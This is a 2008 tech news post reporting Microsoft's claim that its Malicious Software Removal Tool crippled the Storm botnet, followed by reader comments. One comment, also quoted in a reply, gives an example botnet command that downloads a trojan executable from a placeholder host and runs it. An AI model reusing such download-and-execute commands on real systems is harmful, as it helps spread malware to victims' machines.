microsoft
Report a problem

Microsoft: We took out Storm botnet

Steven Parker   on 23 April 2008 - 10:46 · 5 comments & 5567 views

Advertisement (Why?)
Its malware scanner cleaned more then 500k PCs infected with the bot in '07

Microsoft today took credit for crushing the Storm botnet, saying that the malware search-and-destroy tool it distributes to Windows users disinfected so many bots that the hackers threw in the towel.

"They realized they were in our gun sights," said Jimmy Kuo, a principal architect with Microsoft's malware protection center, the group responsible for the Malicious Software Removal Tool (MSRT). Microsoft updates and automatically redistributes the software tool to Windows users each month on Patch Tuesday.

Last year, said Kuo, the criminals behind the Storm Trojan -- malware designed to compromise PCs and add them to a botnet, or collection of infected machines -- tried to keep pace with Microsoft and the MSRT. "They were anticipating our monthly release [of MSRT]," said Kuo, "with new versions that were ready to go immediately before our release."

View: Full Article @ Computer World

Share this Article

  • Technorati
  • Magnolia
  • Stumble upon it
  • Reddit
  • Blink List
  • Delicious
  • Slashdot
  • Furl
  • Facebook
  • Windows Live
  • Google
  • Newsvine
  • Yahoo
  • RawSugar
  • Netvouz

About the Author

Full name: Steven Parker
User name: Neobond
Contact: via forum PM
Submissions: View All
More: View Bio   New!

Related news

 

Post a comment · Send to friend Comments · There are 5 additional comments
(1 reply) #1 n_K on 23 Apr 2008 - 11:36
yeh, or they compressed it using a program like upx or put a different trojan source on the pcs, which isn't very hard (!download http://host/newtrojan.exe C:\runme.exe ~ !run C:\runme.exe)
#1.1 Vandalsquad on 24 Apr 2008 - 11:38
(n_K said @ #1)
yeh, or they compressed it using a program like upx or put a different trojan source on the pcs, which isn't very hard (!download http://host/newtrojan.exe C:\runme.exe ~ !run C:\runme.exe)


And microsofts coding team would have no idea about that would they. MSRT updates are great for the average user, they remove problems they dont even relise they have because of these programs wanting to go updected compared to the old seek and destroy virus types.
#2 soldier1st on 23 Apr 2008 - 17:33
yeah but the next big botnet ms probably wont be able to take down so easily.
(1 reply) #3 toadeater on 24 Apr 2008 - 06:18
I guess Kaspersky, NOD32, etc., had nothing to do with it?
#3.1 Unplugged on 24 Apr 2008 - 08:21
No not really.

People with decent anti-virus solutions are unlikely to be part of a botnet. Its the people that sit with no firewall and anti virus that are the key part of botnets but if Automatic Updates push the MASRT and remove offending stuff then it makes things dififcault.

I imagine a botnet is a lot more pointless if it reduces in size by about 70%

Commenting has either been disabled on this article or you are not logged in. Click here to login or register, its free!

Note: Anonymous commenting is disabled in order to keep the quality of responses to a high standard.

Advertisement (Why?)
News powered by Neowin Management System (Build - 5.0.1390) © 2000 - 2008 Neowin.net